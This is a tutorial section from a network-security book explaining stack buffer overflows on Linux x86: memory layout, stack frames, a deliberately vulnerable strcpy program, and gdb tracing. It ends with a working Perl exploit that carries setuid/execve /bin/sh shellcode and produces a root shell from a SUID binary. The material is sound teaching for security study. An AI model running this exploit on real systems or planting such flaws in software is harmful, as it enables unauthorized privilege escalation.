Network.Security.Tools [Electronic resources] نسخه متنی

5.2. Overview of Stack Buffer Overflows

Security problems
have always been an issue in software. From users abusing
time-sharing operating systems in the '70s to the
remote network compromises of the current day, software always
has, and always will have, security bugs. Starting in the
late 1980s, a new type of software vulnerability known as
the buffer overflow
began to be exploited. Since then overflows have become the
undisputed king of vulnerabilities, accounting for the majority of
security advisories in the last 10 years.

What follows is a brief refresher on
stack-based
buffer overflows and how you
can exploit them. This section is intended as an overview only, so
feel free to skip ahead if you already have a firm grasp on the
subject.

5.2.1. Memory Segments and Layout

In general,
today's operating systems
(OSes) support two levels of protected memory areas in which
processes can run: user
space and kernel
space. The kernel space is where the core processes of the
OS execute. The user space is where user-level processes, such
as daemons, execute. A discussion of memory corruption
attacks should distinguish two areas:
kernel-space attacks and attacks on user-level processes. Kernel-space
attacks are beyond the scope of this chapter and really
aren't what MSF was designed for, so
we'll focus on user-space processes. Attacks against
these processes can be divided into local and remote attacks. MSF
in general is used to exploit programs that listen for remote network
connections, and in the example module later in this chapter,
we'll focus on this kind of attack.

Before discussing how to exploit process memory, it is necessary to
understand how the virtual memory for user-level processes is
organized. The following paragraphs discuss the Linux operating
system on the x86 architecture. Many of the general concepts will
apply to other operating systems and architectures.

When the OS initializes a process, it maps five main virtual memory
segments. Each segment has a specific purpose and can either have a
fixed size or grow as needed. Table 5-2 describes
each standard memory segment in
Linux. The code, data, and BSS segments are
populated with information from the executable during process
initialization. The heap and stack typically have fixed
starting positions but then grow according to a
program's instructions. It should be noted that
wherever a fixed-size buffer exists in memory, it can overflow. However,
our discussion will focus on stack segment buffer overflows, as they
account for the majority of exploited overflows.

Table 5-2. Relevant user-space virtual memory segments
Segment name	Description
Code	This segment contains the actual instructions the program will execute.
Data	This segment contains global and static variables with initialized values.
BSS	This segment contains global and static variables that are uninitialized.
Heap	This segment is for dynamic memory allocations.
Stack	This segment is a memory range for allocation of variables local to a function and is thus dynamic, depending on the function call tree.

When the process has finished initialization, the segments will be
ordered, as shown in Figure 5-1.

Figure 5-1. Virtual memory layout of a process

Now that we've looked at and described the memory
segments, let's see in exactly which segments the
variables in our code will be located. Here is a C code snippet that
illustrates the memory regions where the variables will be allocated
when the program is run:

#include <stdlib.h>                 /* malloc( ), free( ) */

int global_initialized = 311;       //located in the data segment
char global_uninitialized;          //located in the bss segment

int main( ){
    int local_int;                  //located on the stack
    static char local_char;         //located in the bss segment
    char *local_ptr;                //located on the stack
    local_ptr =(char *)malloc(12);  //local_ptr points to
                                    //a buffer located on the heap
    char buffer[12];                //entire buffer located on the stack
    free(local_ptr);                //release the heap buffer
    return 0;
}

5.2.2. How a Buffer Overflows and Why It Matters

A process can allocate memory
using stack or heap
segments. Heaps allow the allocation of memory dynamically using C
functions such as malloc( ), but with this comes
the overhead of the OS's internal dynamic memory
allocation routines. Stacks are more convenient for developers
because the declaration syntax is simpler, and there is no overhead
from dynamic memory allocation routines of the OS.

A stack is a last-in-first-out (LIFO) data structure. The common stack
operators are push (to add an item to the top of the stack) and
pop (to remove the last item placed on the stack).
These operators are used at the assembly level by instructions with
the same names. The stack is 32 bits wide and usually has a static
starting position. Its extent is tracked by the
extended base pointer (EBP) and
extended stack pointer (ESP) CPU registers, and it typically grows
"down." As it grows, the top of the
stack (ESP) gets closer to the lowest virtual memory address, as in
Figure 5-2. Also shown in Figure 5-2 is the ESP register, which points to the top
of the stack. The EBP register serves a special purpose, as it
identifies the start of a stack frame by pointing to the bottom of
the current stack frame. A stack
frame is an area of memory that holds the
local function variables as well as the arguments that were passed to
the function that is executing. A new stack frame is set up by saving
the old EBP, moving EBP to the current top of the stack, and
subtracting from ESP to make room for local variables. The program
performs these actions, and later reverses them, using small
series of assembly instructions known as the
prolog and
epilog.
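
The push and pop behavior described above can be sketched with a small model. This is only an illustration under stated assumptions: the model_stack type and its functions are hypothetical names, the "addresses" are array indices rather than real virtual addresses, and each slot is one 32-bit word. The point it shows is that a push moves the top of the stack toward lower addresses and a pop moves it back.

```c
#include <stdint.h>

#define STACK_WORDS 64

/* Hypothetical model of a 32-bit stack: memory[] stands in for the
   stack segment and esp is an index into it, not a real address. */
typedef struct {
    uint32_t memory[STACK_WORDS];
    uint32_t esp;                   /* index of the current top of the stack */
} model_stack;

static void stack_init(model_stack *s) {
    s->esp = STACK_WORDS;           /* empty: top sits just past the highest slot */
}

/* push: move the top toward lower addresses, then store the value. */
static int stack_push(model_stack *s, uint32_t value) {
    if (s->esp == 0) return -1;     /* model stack is full */
    s->esp -= 1;
    s->memory[s->esp] = value;
    return 0;
}

/* pop: read the value at the top, then move the top back up. */
static int stack_pop(model_stack *s, uint32_t *out) {
    if (s->esp == STACK_WORDS) return -1;   /* nothing to pop */
    *out = s->memory[s->esp];
    s->esp += 1;
    return 0;
}
```

Pushing two values and popping twice returns them in reverse order, and esp ends where it started.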

Figure 5-2. Key elements of the stack segment

When a new function is called, the address of the
caller's next instruction is pushed onto the stack.
This address is where the extended
instruction pointer (EIP) should point when the called function
returns control to the caller. Then the prolog pushes the calling
function's EBP onto the stack and sets EBP to
the current value of ESP. As seen in the code snippets in Table 5-3, this creates a new stack frame where space
for new local variables can be allocated by simply subtracting from
ESP to grow the stack.

Table 5-3. An example C program and its x86 disassembly
Example C program	x86 disassembly
1| void example( ){	1| example:
2| int i;	2| push %ebp
3| }	3| mov %esp,%ebp
4| int main( ){	4| sub $0x4,%esp
5| example( );	5| leave
6| }	6| ret
	7| main:
	8| push %ebp
	9| mov %esp,%ebp
	10| sub $0x8,%esp
	11| call 0x8048310 <example>
	12| leave
	13| ret

In Table 5-3 a new stack frame is created when a new function
gets called. Because there are two functions, we'll
have two stack frames. In the disassembly, it's
possible to identify where new stack frames are created by looking
for three things: the prolog, the epilog, and use of the
call instruction. Lines 8 and 9 of the disassembly
show the prolog for the main function. Lines 2 and 3 show the prolog
for the example function.

As the main function starts, the prolog sets up the new stack frame.
Then a new frame for the example function begins
on line 11. The call instruction pushes a
pointer to the next instruction onto the top of the stack. Once in
the example function, the
function's prolog generates the next stack frame. On
line 4, the stack size is adjusted by 4 bytes; this is the space
needed to store the integer variable i. Finally,
the example function's
epilog executes on lines 5 and 6.
It essentially reverses the actions of the prolog and erases the
stack frame.
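
To make the sequence in Table 5-3 concrete, here is a minimal sketch that replays call, prolog, and epilog on a toy machine. Everything in it is an assumption made for illustration: model_cpu and the do_* functions are hypothetical names, register values are word indices into an array rather than real addresses, and instruction addresses are arbitrary numbers.

```c
#include <stdint.h>

#define WORDS 32

/* Hypothetical machine model: register values are word indices into
   stack[], not real addresses. */
typedef struct {
    uint32_t stack[WORDS];
    uint32_t esp, ebp, eip;
} model_cpu;

static void push(model_cpu *c, uint32_t v) { c->stack[--c->esp] = v; }
static uint32_t pop(model_cpu *c)          { return c->stack[c->esp++]; }

/* call: save the address of the caller's next instruction, then jump. */
static void do_call(model_cpu *c, uint32_t target, uint32_t return_to) {
    push(c, return_to);
    c->eip = target;
}

/* prolog: push %ebp; mov %esp,%ebp; sub $locals,%esp */
static void do_prolog(model_cpu *c, uint32_t local_words) {
    push(c, c->ebp);
    c->ebp = c->esp;
    c->esp -= local_words;
}

/* epilog: leave (mov %ebp,%esp; pop %ebp), then ret (pop into EIP) */
static void do_epilog(model_cpu *c) {
    c->esp = c->ebp;
    c->ebp = pop(c);
    c->eip = pop(c);
}
```

After do_prolog, the saved EBP sits at stack[ebp] and the saved return address one word above it, at stack[ebp + 1]. do_epilog restores both registers from those two slots, which is why the value stored in the second slot decides where execution resumes.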

The epilog is important because the
ret instruction returns control to the
calling function. It sets the new instruction
pointer based on the value stored on the stack during the call
instruction. This is the key to what makes stack overflows so
dangerous. Pointers that influence program flow are
located on the stack. If these pointers can be overwritten, we can
gain control of the program's execution.

Here is a sample C code
snippet that takes one user-controlled input and copies it to a
fixed-size stack buffer:

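/* vuln.c */
#include <stdlib.h>   /* exit( ) */
#include <string.h>   /* strcpy( ) */

int main(int argc, char **argv){
    char fixed_buf[8];
    if(argc<2){exit(-1);}
    strcpy(fixed_buf,argv[1]);   /* no length check on argv[1] */
    return 0;
}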

In the following section, the program will be compiled and traced
with a debugger to show the overflow process in action. By using a
program argument of AAAAAAAABBBBCCCC, we can see
how saved EIP (sEIP) is overwritten.
Figure 5-3 shows the stack frame before and after
strcpy( ) to illustrate the
stack's status after the overwrite. Note that the
ASCII codes for the characters A, B, and C are 0x41, 0x42, and 0x43,
respectively. Also notice that the sEIP is being overwritten with
values we control!

Figure 5-3. The stack frame and setup before and after strcpy

Some compilers align stack buffers
differently; depending on your compiler it might take more input to
fully overwrite the sEIP with the example value
0x43434343.
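
The overwrite can also be reproduced without a debugger by modeling the frame as a byte array. The sketch below is a simulation, not the real stack: it assumes the simplest layout (the 8-byte buffer, then saved EBP, then saved EIP, with no compiler padding), the offsets and the "original" saved values are made up, and overflow_model is a hypothetical name. The copy is deliberately unchecked against the buffer size, as strcpy( ) is, but it stays inside a larger arena so the model itself is memory-safe.

```c
#include <stdint.h>
#include <string.h>

#define BUF_SIZE    8   /* size of fixed_buf in vuln.c */
#define SEBP_OFF    8   /* saved EBP right after the buffer (assumed layout) */
#define SEIP_OFF   12   /* saved EIP right after saved EBP (assumed layout) */
#define ARENA_SIZE 64   /* spare room so the model itself stays in bounds */

/* Read four bytes, lowest address first, as a little-endian value. */
static uint32_t load_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void store_le32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Copy input into the model frame without checking it against BUF_SIZE,
   then return whatever value now sits in the saved-EIP slot. */
static uint32_t overflow_model(const char *input, uint8_t *arena) {
    size_t n = strlen(input) + 1;               /* strcpy copies the NUL too */
    if (n > ARENA_SIZE) n = ARENA_SIZE;         /* keeps the simulation safe */
    memset(arena, 0, ARENA_SIZE);
    store_le32(arena + SEBP_OFF, 0xbffff000u);  /* made-up saved EBP */
    store_le32(arena + SEIP_OFF, 0x08048400u);  /* made-up saved EIP */
    memcpy(arena, input, n);
    return load_le32(arena + SEIP_OFF);
}
```

With a short argument such as AAAA the saved EIP slot keeps its original value. With AAAAAAAABBBBCCCC the Bs land on saved EBP and the Cs on saved EIP, so the function returns 0x43434343.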

5.2.3. Shellcode

The good
news is that now we have a way of controlling
program flow. At this point we need
what is commonly referred to as
shellcode.
Shellcode is a set of assembly instructions to which program flow can
be redirected and that performs some function. The term
"shellcode" was coined to reflect
the fact that it contains assembly instructions that execute a shell
(command interpreter), often at higher privilege levels. But where
should we place this shellcode? Because we already used our user
input buffer to take control of EIP, there is no reason we
can't use the same buffer to serve a dual purpose by
also including the shellcode directly in the buffer. Because this
overflow occurs in a C-style string, we must write the shellcode
so that it contains no NUL (0x00) byte, which would terminate the
string and cut the copy short.
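
A quick way to see why the zero byte matters is to scan a candidate payload for it. The helpers below are a hypothetical sketch (the function names are not from any library): one finds the first 0x00 byte, the other reports how many payload bytes a strcpy( )-style copy would carry over before stopping.

```c
#include <stddef.h>

/* Return the index of the first 0x00 byte in payload, or -1 if none. */
static long first_nul_byte(const unsigned char *payload, size_t len) {
    for (size_t i = 0; i < len; i++) {
        if (payload[i] == 0x00) return (long)i;
    }
    return -1;
}

/* Number of payload bytes a strcpy()-style copy would carry over:
   copying stops at the first NUL. If the payload has no NUL within len,
   this model simply reports len. */
static size_t bytes_copied(const unsigned char *payload, size_t len) {
    long nul = first_nul_byte(payload, len);
    return nul < 0 ? len : (size_t)nul;
}
```

For example, the x86 encoding of mov $0x17,%eax is b8 17 00 00 00, which contains zero bytes, so a string copy would stop after the first two bytes. Clearing the register with xor %eax,%eax (31 c0) and then loading only the low byte with mov $0x17,%al (b0 17) reaches the same register value without any zero bytes.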

In an ideal world of exploitation, the top of the stack
wouldn't move and we could jump to this known
location every time. But in the real world of remote exploits many
factors affect where the top of the stack will be on program return,
so we need a solution for dealing with these variations in where our
shellcode will lie.

One way of dealing with this problem is to use what is commonly known
as a NOP sled. The NOP assembly instruction
performs "no operation." It
basically does nothing and has no effect on any CPU registers or
flags. What is good about this is that we can prepend our shellcode
with a buffer that consists solely of the bytes that represent the
NOP instruction; on x86 architecture this is 0x90. This technique
compensates for the stack's unpredictability by
changing program flow to anywhere within the NOP sled, and the
execution will continue up the buffer until it hits the shellcode.
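
The effect of the sled can be modeled in a few lines. In this sketch, build_sled and slide are hypothetical names, the payload is a placeholder rather than real shellcode, and "execution" is reduced to stepping over 0x90 bytes. It illustrates that any landing offset inside the sled ends up at the same place: the first byte of the payload.

```c
#include <stddef.h>
#include <string.h>

#define NOP 0x90   /* x86 opcode for the NOP instruction */

/* Fill out[] with sled_len NOP bytes followed by the payload.
   Returns the number of bytes written, or 0 if out is too small. */
static size_t build_sled(unsigned char *out, size_t out_cap, size_t sled_len,
                         const unsigned char *payload, size_t payload_len) {
    if (sled_len > out_cap || payload_len > out_cap - sled_len) return 0;
    memset(out, NOP, sled_len);
    memcpy(out + sled_len, payload, payload_len);
    return sled_len + payload_len;
}

/* Model of execution landing at offset `landing`: step over NOP bytes
   and return the offset of the first non-NOP byte reached. */
static size_t slide(const unsigned char *buf, size_t len, size_t landing) {
    size_t pc = landing;
    while (pc < len && buf[pc] == NOP) pc++;
    return pc;
}
```

With a 32-byte sled, landing at offset 0, 17, or 31 all slide to offset 32, where the payload begins. A longer sled widens the range of return addresses that still work.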

Putting together the concepts we learned so far, we now can construct
user input to take control of program execution and run arbitrary
shellcode. Figure 5-4 shows what our final buffer
for the first program argument will look like.

Figure 5-4. Final construction of the input buffer

The known values in this buffer are the shellcode and the NOP sled.
For local exploits such as this one, you should use a shellcode that
does setuid( ) and exec( ) to spawn the
new root-level shell. The aforementioned \x90
character will be used to fill the NOP sled. In our example, the
values to be used for the "filler
space" buffer can be arbitrary printable ASCII, so
we'll use the character A. The final unknown is
the new EIP value, that is, the memory location we hope will be
within our NOP sled. This new EIP value is commonly known as
the return. To find it, use a debugger to examine
the process memory after using a trace buffer to trigger the
vulnerability. We construct a trace buffer so that it is visually
easier to find key areas of the buffer in memory.

First, compile the executable with debugging symbols:

$ gcc vuln.c -o vuln -g

Next, run the gdb
debugger. Once in the
gdb shell, run the program with a simple trace
buffer generated from the command line using Perl:

$ gdb -q vuln
(gdb) run `perl -e 'print "A"x28 . "1234" . "C"x1024'`
Starting program: /home/cabetas/research/book/vuln `perl -e 
'print "A"x28 . "1234" . "C"x1024'`
Program received signal SIGSEGV, Segmentation fault.
0x34333231 in ?? ( )
(gdb) x/x $esp
0xbfff8d60:     0x43434343
(gdb) x/x $esp+1020
0xbfff915c:     0x43434343
(gdb) print ($esp+512)
$1 = (void *) 0xbfff8f60

Note that the buffer's structure is modeled after
what our eventual exploit buffer will look like, with the bytes
1234 directly overwriting the sEIP and the
Cs representing where our NOP sled will be. Also
note that in this example the compiler aligned my buffer in such a
way that it took 28 bytes before overwriting sEIP.
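
For readers who prefer C to the Perl one-liner, the same trace buffer can be generated as follows. This is a sketch: build_trace is a hypothetical helper, and the 28-byte filler length is the value observed in this particular build, so it may differ with another compiler.

```c
#include <stddef.h>
#include <string.h>

#define FILLER_LEN 28       /* offset to sEIP seen in the text; compiler-dependent */
#define MARKER     "1234"   /* four bytes expected to land on sEIP */
#define TAIL_LEN   1024     /* stands in for the future NOP sled */

/* Write filler + marker + tail as a NUL-terminated string into out.
   Returns the string length, or 0 if out is too small. */
static size_t build_trace(char *out, size_t out_cap) {
    size_t marker_len = strlen(MARKER);
    size_t total = FILLER_LEN + marker_len + TAIL_LEN;
    if (out_cap < total + 1) return 0;
    memset(out, 'A', FILLER_LEN);
    memcpy(out + FILLER_LEN, MARKER, marker_len);
    memset(out + FILLER_LEN + marker_len, 'C', TAIL_LEN);
    out[total] = '\0';
    return total;
}
```

The distinct marker makes it easy to confirm the offset: if the faulting address is not built from the marker bytes, the filler length needs adjusting.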

The program generates a segmentation fault, which signifies that it
attempted to access an unmapped area of memory. This memory location
is 0x34333231, the ASCII code equivalent of 4321.

Little-Endian Memory Values

Why did our sEIP overwrite come out backward from our input? The
answer has to do with how memory values are stored on x86
architectures. The little-endian format stores multibyte values with
the least significant byte at the lowest address. For our example, the
overwritten bytes 1234 are read as 0x34333231 in
little-endian order and would be read as 0x31323334 in big-endian
order. The byte values remain the same, but they are switched so that
the least significant byte is stored first.
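
The byte ordering can be checked with a few lines of C. The helper names below are hypothetical; write_le32 produces the same byte order as the pack('V', ...) call used in the Perl script in this chapter.

```c
#include <stdint.h>

/* Interpret four bytes, lowest address first, as a little-endian value. */
static uint32_t read_le32(const unsigned char *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Interpret the same four bytes as a big-endian value. */
static uint32_t read_be32(const unsigned char *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Store a 32-bit value least significant byte first. */
static void write_le32(unsigned char *p, uint32_t v) {
    p[0] = (unsigned char)(v & 0xff);
    p[1] = (unsigned char)((v >> 8) & 0xff);
    p[2] = (unsigned char)((v >> 16) & 0xff);
    p[3] = (unsigned char)((v >> 24) & 0xff);
}
```

Reading the bytes '1', '2', '3', '4' with read_le32 gives 0x34333231, the address reported by gdb, while read_be32 gives 0x31323334. Going the other way, write_le32 turns 0xbfff8f60 into the byte sequence 60 8f ff bf.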

After the program crashes, examine the memory located at the
stack pointer (ESP).
You'll notice it points to byte values that
represent the letter C. If you examine the memory before and after
ESP you'll see the buffer actually starts here and
the last four-byte block is located at $esp+1020.
Because this is where we will eventually place our NOP sled, we want
to find a value within this range. We will use the
$esp+512 value because it's the
midpoint of the buffer, and it has the highest chance of success. Now
we have the new EIP value that the exploited program will return to:
0xbfff8f60.
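
The arithmetic behind the choice of the midpoint is simple enough to sketch. Here pick_return and lands_in_sled are hypothetical helpers, and the start address and length are the values from the gdb session above. The second function shows why the midpoint is the most tolerant choice: the sled can shift by almost half its length in either direction and the return address still falls inside it.

```c
#include <stdint.h>

/* Return address aimed at the middle of the sled. */
static uint32_t pick_return(uint32_t sled_start, uint32_t sled_len) {
    return sled_start + sled_len / 2;
}

/* Nonzero if ret falls inside a sled that starts at sled_start. */
static int lands_in_sled(uint32_t ret, uint32_t sled_start, uint32_t sled_len) {
    return ret >= sled_start && ret - sled_start < sled_len;
}
```

With a start of 0xbfff8d60 and a length of 1024, pick_return gives 0xbfff8f60. If the stack ends up 500 bytes higher or lower at exploit time, that address is still within the sled; a shift of 600 bytes upward is enough to miss it.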

5.2.4. Putting It All Together: Exploiting a Program

All the elements of our exploit buffer are in
place: the filler, the new EIP the program will return to, the NOP
sled, and our shellcode. It's time to try it out
from the command line outside the debugger. Here is a Perl script
that generates an exploit buffer using the previously discussed
values. Note that the pack( ) function handles the
little-endian conversion:

#!/usr/bin/perl
# File: exploit_buffer.pl
my $shellcode = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80".
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b".
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd".
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
my $return = 0xbfff8f60;
print "A"x28 . pack('V',$return) . "\x90"x1024 . $shellcode;
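
The layout that the Perl script prints can be expressed in C as well, which makes each region's offset explicit. This is a sketch of the layout only: build_layout is a hypothetical helper, the payload is passed in by the caller (a placeholder byte is enough to inspect the structure), and the filler and sled lengths are the values used in this chapter.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define FILLER_LEN 28     /* bytes before sEIP in this build; compiler-dependent */
#define SLED_LEN   1024   /* NOP sled length used in the text */

/* Lay out: filler | return address (little-endian) | NOP sled | payload.
   Returns the number of bytes written, or 0 if out is too small. */
static size_t build_layout(unsigned char *out, size_t cap, uint32_t ret,
                           const unsigned char *payload, size_t payload_len) {
    const size_t fixed = FILLER_LEN + 4 + SLED_LEN;
    unsigned char *p = out;
    if (cap < fixed || payload_len > cap - fixed) return 0;
    memset(p, 'A', FILLER_LEN);
    p += FILLER_LEN;
    p[0] = (unsigned char)(ret & 0xff);          /* same order as pack('V') */
    p[1] = (unsigned char)((ret >> 8) & 0xff);
    p[2] = (unsigned char)((ret >> 16) & 0xff);
    p[3] = (unsigned char)((ret >> 24) & 0xff);
    p += 4;
    memset(p, 0x90, SLED_LEN);
    p += SLED_LEN;
    memcpy(p, payload, payload_len);
    return fixed + payload_len;
}
```

Bytes 0 to 27 are filler, bytes 28 to 31 hold the return address, bytes 32 to 1055 are the sled, and the payload starts at offset 1056.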

The chown and chmod commands
are used to set up our example program as a set user
ID (SUID) application. These commands
cause the program to be executed at the root user's
privilege level. This is done to demonstrate the effect of an
exploited SUID root program in the wild.

$ su
Password:
# chown root:root ./vuln
# chmod +s ./vuln
# exit
$ ls -la vuln
-rwsrwsr-x    1 root     root         5817 Jan 24 05:50 vuln

Now for the actual exploitation of the program. Use the
` (backtick) character to execute the
Perl script that generates our exploit buffer. This buffer becomes
the first argument to our vulnerable program. As previously
mentioned, the overflow overwrites the sEIP with our
new return value, which should point into our NOP sled. Execution
continues up the NOP sled until our shellcode executes, giving us
root access.

$ ./vuln `perl exploit_buffer.pl`
# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

If you are using Perl version 5.8.0 or newer with UNICODE support,
you should unset the LANG environment variable to
ensure that functions such as pack( ) work as
expected. Various parts of MSF will fail otherwise. As a test, the
following shell command should print the number 4
when your locale settings are correct:

perl -e 'print pack("V",0xffffffff);' |wc -c
